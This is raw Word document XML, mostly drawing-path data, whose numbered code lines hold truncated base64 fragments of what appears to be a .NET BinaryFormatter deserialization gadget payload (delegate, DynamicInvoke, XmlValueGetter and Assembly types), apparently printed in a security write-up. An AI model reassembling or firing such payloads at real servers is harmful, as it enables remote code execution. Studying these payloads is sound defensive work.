2639,14265,2641,14265,2644,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14266,2646,14266,2646,14266,2646,14266,2646,14266,2646,14266,2646,14266,2646,14266,2646,14267,2646,14267,2646,14267,2646,14267,2646,14268,2646,14268,2646,14268,2646,14269,2646,14269,2646,14269,2646,14270,2646,14270,2646,14271,2646,14271,2646,14272,2646,14272,2646,14273,2646,14273,2646,14274,2646,14275,2646,14275,2646,14276,2646,14277,2646,14278,2646,14279,2646,14280,2646,14280,2646,14281,2646,14282,2646,14283,2646,14285,2646,14286,2646,14287,2646,14288,2646,14289,2646,14291,2646,14292,2646,14293,2646,14295,2646,14296,2646,14298,2646,14299,2646,14301,2646,14303,2646,14304,2646,14306,2646,14308,2646,14310,2646,14312,2646,14314,2646,14316,2646,14318,2646,14320,2646,14322,2646,14325,2646,14327,2646,14330,2646,14332,2646,14335,2646,14337,2646,14340,2646,14343,2646,14345,2646,14348,2646,14351,2646,14354,2646,14357,2646,14360,2646,14364,2646,14367,2646,14370,2646,14374,2646,14377,2646,14381,2646,14384,2646,14388,2646,14392,2646,14396,2646,14400,2646,14404,2646,14408,2646,14412,2646,14417,2646,14421,2646,14425,2646,14430,2646,14434,2646,14439,2646,14444,2646,14449,2646,14454,2646,14459,2646,14464,2646,14469,2646,14475,2646,14480,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2645,14486,2645,14486,2645,14486,2645,14486,2645,14486,2645,14486,2645,14486,2644,14486,2644,14486,2644,14486,2644,14486,2643,14486,2643,14486,2643,14486,2643,14486,2642,14486,2642,14486,2642,14486,2641,14486,2641,14486,2641,14486,2640,14486,2640,14486,2640,14486,2639,14486,2639,14486,2638,14486,2638,14486,2637,14486,2637,14486,2636,14486,2636,14486,2635,14486,2634,14486,2634,14486,2633,14486,2632,14486,2632,14486,2631,14486,2630,14486,2629,14486,2629,14486,2628,14486,2627,14486,2626,14486,2625,14486,2624,14486,2623,14486,2622,14486,2621,14486,2620,14486,2619,14486,2618,14486,2617,14486,2616,14486,2615,14486,2614,14486,2612,14486,2611,14486,2610,14486,2609,14486,2607,14486,2606,14486,2604,14486,2603,14486,2601,14486,2600,14486,2598,14486,2597,14486,2595,14486,2594,14486,2592,14486,2590,14486,2588,14486,2587,14486,2585,14486,2583,14486,2581,14486,2579,14486,2577,14486,2575,14486,2573,14486,2571,14486,2569,14486,2567,14486,2564,14486,2562,14486,2560,14486,2558,14486,2555,14486,2553,14486,2550,14486,2548,14486,2545,14486,2543,14486,2543,14486,2543,14486,2543,14486,2543,14486,2543,14486,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14484,2543,14484,2543,14484,2543,14484,2543,14484,2543,14483,2543,14483,2543,14483,2543,14483,2543,14482,2543,14482,2543,14482,2543,14481,2543,14481,2543,14480,2543,14480,2543,14479,2543,14479,2543,14478,2543,14478,2543,14477,2543,14476,2543,14476,2543,14475,2543,14474,2543,14474,2543,14473,2543,14472,2543,14471,2543,14470,2543,14469,2543,14468,2543,14467,2543,14466,2543,14465,2543,14464,2543,14463,2543,14461,2543,14460,2543,14459,2543,14457,2543,14456,2543,14454,2543,14453,2543,14451,2543,14450,2543,14448,2543,14446,2543,14444,2543,14443,2543,14441,2543,14439,2543,14437,2543,14435,2543,14433,2543,14430,2543,14428,2543,14426,2543,14423,2543,14421,2543,14419,2543,14416,2543,14413,2543,14411,2543,14408,2543,14405,2543,14402,2543,14399,2543,14396,2543,14393,2543,14390,2543,14387,2543,14384,2543,14380,2543,14377,2543,14373,2543,14370,2543,14366,2543,14362,2543,14359,2543,14355,2543,14351,2543,14347,2543,14343,2543,14338,2543,14334,2543,14330,2543,14325,2543,14321,2543,14316,2543,14311,2543,14307,2543,14302,2543,14297,2543,14292,2543,14287,2543,14281,2543,14276,2543,14271,2543,14265e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:740.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,14810" coordsize="110,230">
        <v:shape style="position:absolute;left:2110;top:14810;width:110;height:230" coordorigin="2110,14810" coordsize="110,230" path="m2128,14823l2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2129,14823,2129,14823,2129,14823,2129,14823,2129,14823,2129,14823,2129,14823,2129,14823,2130,14823,2130,14823,2130,14823,2130,14823,2131,14823,2131,14823,2131,14823,2131,14823,2132,14823,2132,14823,2132,14823,2133,14823,2133,14823,2133,14823,2134,14823,2134,14823,2134,14823,2135,14823,2135,14823,2136,14823,2136,14823,2137,14823,2137,14823,2138,14823,2138,14823,2139,14823,2140,14823,2140,14823,2141,14823,2142,14823,2142,14823,2143,14823,2144,14823,2145,14823,2145,14823,2146,14823,2147,14823,2148,14823,2149,14823,2150,14823,2151,14823,2152,14823,2153,14823,2154,14823,2155,14823,2156,14823,2157,14823,2158,14823,2159,14823,2160,14823,2162,14823,2163,14823,2164,14823,2165,14823,2167,14823,2168,14823,2170,14823,2171,14823,2173,14823,2174,14823,2176,14823,2177,14823,2179,14823,2180,14823,2182,14823,2184,14823,2186,14823,2187,14823,2189,14823,2191,14823,2193,14823,2195,14823,2197,14823,2199,14823,2201,14823,2203,14823,2205,14823,2207,14823,2210,14823,2212,14823,2214,14823,2216,14823,2219,14823,2221,14823,2224,14823,2226,14823,2229,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14824,2231,14824,2231,14824,2231,14824,2231,14824,2231,14824,2231,14825,2231,14825,2231,14825,2231,14826,2231,14826,2231,14826,2231,14827,2231,14827,2231,14827,2231,14828,2231,14828,2231,14829,2231,14829,2231,14830,2231,14830,2231,14831,2231,14832,2231,14832,2231,14833,2231,14834,2231,14835,2231,14835,2231,14836,2231,14837,2231,14838,2231,14839,2231,14840,2231,14841,2231,14842,2231,14843,2231,14844,2231,14846,2231,14847,2231,14848,2231,14850,2231,14851,2231,14852,2231,14854,2231,14855,2231,14857,2231,14859,2231,14860,2231,14862,2231,14864,2231,14866,2231,14868,2231,14869,2231,14871,2231,14874,2231,14876,2231,14878,2231,14880,2231,14882,2231,14885,2231,14887,2231,14890,2231,14892,2231,14895,2231,14897,2231,14900,2231,14903,2231,14906,2231,14909,2231,14912,2231,14915,2231,14918,2231,14921,2231,14925,2231,14928,2231,14931,2231,14935,2231,14938,2231,14942,2231,14946,2231,14950,2231,14953,2231,14957,2231,14961,2231,14966,2231,14970,2231,14974,2231,14978,2231,14983,2231,14987,2231,14992,2231,14997,2231,15002,2231,15006,2231,15011,2231,15016,2231,15022,2231,15027,2231,15032,2231,15038,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2230,15043,2230,15043,2230,15043,2230,15043,2230,15043,2230,15043,2230,15043,2229,15043,2229,15043,2229,15043,2229,15043,2229,15043,2228,15043,2228,15043,2228,15043,2227,15043,2227,15043,2227,15043,2227,15043,2226,15043,2226,15043,2225,15043,2225,15043,2225,15043,2224,15043,2224,15043,2223,15043,2223,15043,2222,15043,2222,15043,2221,15043,2221,15043,2220,15043,2219,15043,2219,15043,2218,15043,2217,15043,2217,15043,2216,15043,2215,15043,2214,15043,2214,15043,2213,15043,2212,15043,2211,15043,2210,15043,2209,15043,2208,15043,2207,15043,2206,15043,2205,15043,2204,15043,2203,15043,2202,15043,2201,15043,2200,15043,2199,15043,2197,15043,2196,15043,2195,15043,2194,15043,2192,15043,2191,15043,2189,15043,2188,15043,2187,15043,2185,15043,2183,15043,2182,15043,2180,15043,2179,15043,2177,15043,2175,15043,2173,15043,2172,15043,2170,15043,2168,15043,2166,15043,2164,15043,2162,15043,2160,15043,2158,15043,2156,15043,2154,15043,2152,15043,2149,15043,2147,15043,2145,15043,2143,15043,2140,15043,2138,15043,2135,15043,2133,15043,2130,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15042,2128,15042,2128,15042,2128,15042,2128,15042,2128,15042,2128,15042,2128,15041,2128,15041,2128,15041,2128,15041,2128,15040,2128,15040,2128,15040,2128,15039,2128,15039,2128,15038,2128,15038,2128,15037,2128,15037,2128,15036,2128,15036,2128,15035,2128,15035,2128,15034,2128,15033,2128,15033,2128,15032,2128,15031,2128,15030,2128,15030,2128,15029,2128,15028,2128,15027,2128,15026,2128,15025,2128,15024,2128,15023,2128,15021,2128,15020,2128,15019,2128,15018,2128,15016,2128,15015,2128,15013,2128,15012,2128,15010,2128,15009,2128,15007,2128,15005,2128,15004,2128,15002,2128,15000,2128,14998,2128,14996,2128,14994,2128,14992,2128,14990,2128,14988,2128,14986,2128,14983,2128,14981,2128,14979,2128,14976,2128,14974,2128,14971,2128,14968,2128,14966,2128,14963,2128,14960,2128,14957,2128,14954,2128,14951,2128,14948,2128,14945,2128,14941,2128,14938,2128,14934,2128,14931,2128,14927,2128,14924,2128,14920,2128,14916,2128,14912,2128,14908,2128,14904,2128,14900,2128,14896,2128,14892,2128,14887,2128,14883,2128,14878,2128,14874,2128,14869,2128,14864,2128,14859,2128,14854,2128,14849,2128,14844,2128,14839,2128,14834,2128,14828,2128,14823e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:740.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,14810" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:14810;width:110;height:230" coordorigin="2530,14810" coordsize="110,230" path="m2543,14823l2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2544,14823,2544,14823,2544,14823,2544,14823,2544,14823,2544,14823,2544,14823,2545,14823,2545,14823,2545,14823,2545,14823,2545,14823,2546,14823,2546,14823,2546,14823,2547,14823,2547,14823,2547,14823,2548,14823,2548,14823,2548,14823,2549,14823,2549,14823,2549,14823,2550,14823,2550,14823,2551,14823,2551,14823,2552,14823,2552,14823,2553,14823,2553,14823,2554,14823,2555,14823,2555,14823,2556,14823,2557,14823,2557,14823,2558,14823,2559,14823,2560,14823,2560,14823,2561,14823,2562,14823,2563,14823,2564,14823,2565,14823,2566,14823,2567,14823,2568,14823,2569,14823,2570,14823,2571,14823,2572,14823,2573,14823,2574,14823,2575,14823,2577,14823,2578,14823,2579,14823,2580,14823,2582,14823,2583,14823,2585,14823,2586,14823,2587,14823,2589,14823,2591,14823,2592,14823,2594,14823,2595,14823,2597,14823,2599,14823,2601,14823,2602,14823,2604,14823,2606,14823,2608,14823,2610,14823,2612,14823,2614,14823,2616,14823,2618,14823,2620,14823,2622,14823,2625,14823,2627,14823,2629,14823,2631,14823,2634,14823,2636,14823,2639,14823,2641,14823,2644,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14824,2646,14824,2646,14824,2646,14824,2646,14824,2646,14824,2646,14825,2646,14825,2646,14825,2646,14826,2646,14826,2646,14826,2646,14827,2646,14827,2646,14827,2646,14828,2646,14828,2646,14829,2646,14829,2646,14830,2646,14830,2646,14831,2646,14832,2646,14832,2646,14833,2646,14834,2646,14835,2646,14835,2646,14836,2646,14837,2646,14838,2646,14839,2646,14840,2646,14841,2646,14842,2646,14843,2646,14844,2646,14846,2646,14847,2646,14848,2646,14850,2646,14851,2646,14852,2646,14854,2646,14855,2646,14857,2646,14859,2646,14860,2646,14862,2646,14864,2646,14866,2646,14868,2646,14869,2646,14871,2646,14874,2646,14876,2646,14878,2646,14880,2646,14882,2646,14885,2646,14887,2646,14890,2646,14892,2646,14895,2646,14897,2646,14900,2646,14903,2646,14906,2646,14909,2646,14912,2646,14915,2646,14918,2646,14921,2646,14925,2646,14928,2646,14931,2646,14935,2646,14938,2646,14942,2646,14946,2646,14950,2646,14953,2646,14957,2646,14961,2646,14966,2646,14970,2646,14974,2646,14978,2646,14983,2646,14987,2646,14992,2646,14997,2646,15002,2646,15006,2646,15011,2646,15016,2646,15022,2646,15027,2646,15032,2646,15038,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2645,15043,2645,15043,2645,15043,2645,15043,2645,15043,2645,15043,2645,15043,2644,15043,2644,15043,2644,15043,2644,15043,2643,15043,2643,15043,2643,15043,2643,15043,2642,15043,2642,15043,2642,15043,2641,15043,2641,15043,2641,15043,2640,15043,2640,15043,2640,15043,2639,15043,2639,15043,2638,15043,2638,15043,2637,15043,2637,15043,2636,15043,2636,15043,2635,15043,2634,15043,2634,15043,2633,15043,2632,15043,2632,15043,2631,15043,2630,15043,2629,15043,2629,15043,2628,15043,2627,15043,2626,15043,2625,15043,2624,15043,2623,15043,2622,15043,2621,15043,2620,15043,2619,15043,2618,15043,2617,15043,2616,15043,2615,15043,2614,15043,2612,15043,2611,15043,2610,15043,2609,15043,2607,15043,2606,15043,2604,15043,2603,15043,2601,15043,2600,15043,2598,15043,2597,15043,2595,15043,2594,15043,2592,15043,2590,15043,2588,15043,2587,15043,2585,15043,2583,15043,2581,15043,2579,15043,2577,15043,2575,15043,2573,15043,2571,15043,2569,15043,2567,15043,2564,15043,2562,15043,2560,15043,2558,15043,2555,15043,2553,15043,2550,15043,2548,15043,2545,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15042,2543,15042,2543,15042,2543,15042,2543,15042,2543,15042,2543,15042,2543,15041,2543,15041,2543,15041,2543,15041,2543,15040,2543,15040,2543,15040,2543,15039,2543,15039,2543,15038,2543,15038,2543,15037,2543,15037,2543,15036,2543,15036,2543,15035,2543,15035,2543,15034,2543,15033,2543,15033,2543,15032,2543,15031,2543,15030,2543,15030,2543,15029,2543,15028,2543,15027,2543,15026,2543,15025,2543,15024,2543,15023,2543,15021,2543,15020,2543,15019,2543,15018,2543,15016,2543,15015,2543,15013,2543,15012,2543,15010,2543,15009,2543,15007,2543,15005,2543,15004,2543,15002,2543,15000,2543,14998,2543,14996,2543,14994,2543,14992,2543,14990,2543,14988,2543,14986,2543,14983,2543,14981,2543,14979,2543,14976,2543,14974,2543,14971,2543,14968,2543,14966,2543,14963,2543,14960,2543,14957,2543,14954,2543,14951,2543,14948,2543,14945,2543,14941,2543,14938,2543,14934,2543,14931,2543,14927,2543,14924,2543,14920,2543,14916,2543,14912,2543,14908,2543,14904,2543,14900,2543,14896,2543,14892,2543,14887,2543,14883,2543,14878,2543,14874,2543,14869,2543,14864,2543,14859,2543,14854,2543,14849,2543,14844,2543,14839,2543,14834,2543,14828,2543,14823e x" fillcolor="#fefefe" stroke="f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68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65" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>47</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZU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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Vu"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9u"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlcl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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>R5"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>51</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>YR"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCw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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5Y"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNz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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dh"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQX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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Nz"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
